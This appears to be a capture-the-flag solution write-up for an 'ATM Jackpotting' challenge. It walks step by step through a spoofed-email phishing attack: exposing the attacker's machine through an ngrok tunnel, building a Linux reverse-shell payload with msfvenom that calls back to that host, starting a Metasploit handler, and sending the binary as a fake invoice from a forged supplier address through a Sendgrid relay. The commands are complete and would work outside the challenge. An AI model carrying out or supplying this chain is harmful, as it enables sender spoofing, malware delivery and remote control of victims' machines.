Solution: Email Spoof - Malicious Attachments (ATM Jackpotting)

Tools Used:

The big picture:

  1. We'll expose our local machine's port 80 to the internet via Ngrok.
  2. We'll create our malicious attachment with Metasploit / msfvenom
  3. We'll setup a Sendgrid SMTP relay, and then use that to send our email via the sendEmail command line email client.

Expose our machine's port 80 to internet with Ngrok

This part's pretty easy. Go to https://ngrok.com/download and click download. Once downloaded, unzip it (and if necessary run `chmod +x ./ngrok`). Then execute it with:
  ./ngrok tcp 443
You'll see a ngrok status screen come up, and it will show you your url and port. Pull out your url and port as we'll be needing that soon - for example, mine was tcp://0.tcp.ngrok.io:19358

Metasploit / msfvenom: Generate malicious attachment

msfvenom --platform linux -p linux/x64/shell/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19358 -b "\x00" -f elf > ~/Desktop/runme

LHOST and LPORT are the ip/port you want the victim to connect to (in this case, ngrok's)

Replace the LHOST and LPORT from above with your ngrok information

chmod 755 ~/Desktop/runme

msfconsole -q -x "use exploit/multi/handler;set payload linux/x64/shell/reverse_tcp; set LHOST 127.0.0.1; set LPORT 443; run; exit -y"

Setting up an SMTP relay

First we need to get access to an SMTP relay that will let us send an email FROM our target account. The easiest way I've found to do this is with Sendgrid. You may be able to sign up directly with their free account, but what I did is use my Heroku account. In Heroku, create a new application, add Sendgrid's free tier as a resource.

You'll then need to open Sendgrid, and go to Settings / Tracking. Turn "Click Tracking" off, otherwise Sendgrid will replace all urls in your email with theirs, and that may break things.

Now back in Heroku, if you go to the Settings tab on your application and view the Config Vars, you'll have your SENDGRID_USERNAME and SENDGRID_PASSWORD. We'll need those in a second.

Sending the email

In Kali Linux, open a terminal. We're going to be using the command below, but replacing some things.

sendEmail -u "Invoice Attached" -f ATMSupplier_EMAIL_GOES_HERE -t BankExec_EMAIL_GOES_HERE -s smtp.sendgrid.net:587 -xu SENDGRID_USERNAME_GOES_HERE -xp SENDGRID_PASSWORD_GOES_HERE -m "Your invoice is attached." -a "/root/Desktop/runme"
In the above, replace BankExec_EMAIL_GOES_HERE and ATMSupplier_EMAIL_GOES_HERE with the appropriate email addresses from the challenge scope. Replace SENDGRID_USERNAME_GOES_HERE and SENDGRID_PASSWORD_GOES_HERE with the values you obtained from Sendgrid. Then... just hit enter and send that email. You should see a success message that Sendgrid's SMTP server accepted and sent the email.

Soon you're attachment will be executed by Bank Exec, and a shell will be popped for you. Open the shell and read the file containing the flag.

To get a nicer command prompt, you can use this in the shell that is popped:

python -c "import pty; pty.spawn('/bin/bash');"